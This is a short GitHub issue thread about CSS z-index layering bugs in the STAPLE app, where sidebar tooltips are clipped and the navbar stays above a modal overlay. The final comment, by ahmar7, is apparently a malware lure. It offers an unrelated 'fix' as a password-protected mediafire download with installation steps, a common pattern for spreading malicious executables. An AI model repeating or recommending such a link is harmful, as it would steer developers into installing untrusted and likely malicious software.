### ISSUE TITLE
CSS layering

### ISSUE THREAD

**Issue by marton-balazs-kovacs** [STAPLE-verse/STAPLE#210]
The CSS code for the app is hard to decipher and leads to some unexpected behavior especially when it comes to layering with z. This concerns the tooltips in the sidebar (they are cut off by the main body) and the main navbar when a modal is open (navbar is not behind background overlay).

**Comment by marton-balazs-kovacs** [comment]
issue #199 is related

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
